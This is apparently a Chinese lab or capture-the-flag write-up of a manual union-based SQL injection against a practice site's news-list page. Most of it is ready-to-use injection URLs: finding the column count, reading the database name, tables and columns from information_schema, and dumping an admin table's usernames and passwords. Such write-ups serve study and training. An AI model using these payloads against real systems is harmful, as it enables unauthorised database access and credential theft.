SQL过滤字符后手工注入漏洞测试(第3题)
按照正常流程,首先在url中输入单引号发现报错,接着输入–+发现页面正常
此url种存在着字符型注入
第一步判断字段数
利用order by进行判断,发现字段数是7
?id=1' order by 7 --+
查找回显点
?id=-1' union select 1,2,3,4,5,6, 7 --+
http://219.153.49.228:45820/new_list.php?id=-1’ union select 1,2,3,4,5,6, 7 --+
都是回显点
关键字也没被过滤,按照流程步骤一步一步进行爆破
爆库 min_ju4t_mel1i
http://219.153.49.228:45820/new_list.php?id=-1’ union select 1,database(),3,4,5,6, 7 --+
爆破表 (@dmin9_td4b},notice, stormgroup_member tdb_goods
http://219.153.49.228:45820/new_list.php?id=-1’ union select 1,group_concat(table_name),3,4,5,6, 7 from information_schema.tables where table_schema = database()–+
爆破字段 id, username, password, status
http://219.153.49.228:45820/new_list.php?id=-1’ union select 1,group_concat(column_name),3,4,5,6, 7 from information_schema.columns where table_schema = database() and table_name = ‘(@dmin9_td4b}’ --+
爆字段值
http://219.153.49.228:45820/new_list.php?id=-1’ union select 1,group_concat(username),group_concat(password),group_concat(status),group_concat(id),6,7 from (@dmin9_td4b}–+
注意其中表名被反单引号包裹,英文状态下tap键
根据status状态码,找到用户名密码即可